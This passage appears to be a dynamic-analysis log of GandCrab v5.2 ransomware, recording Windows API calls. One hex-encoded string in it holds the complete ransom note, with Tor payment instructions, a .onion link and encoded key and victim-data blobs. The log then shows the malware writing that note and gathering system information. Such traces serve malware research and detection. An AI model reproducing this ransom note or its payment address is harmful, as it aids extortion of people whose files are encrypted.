(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.260] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0096.261] CloseHandle (hObject=0x2b4) returned 1 [0096.261] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.261] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.262] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x246)) [0096.262] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.262] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.262] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.262] wsprintfW (in: param_1=0x1e70000, 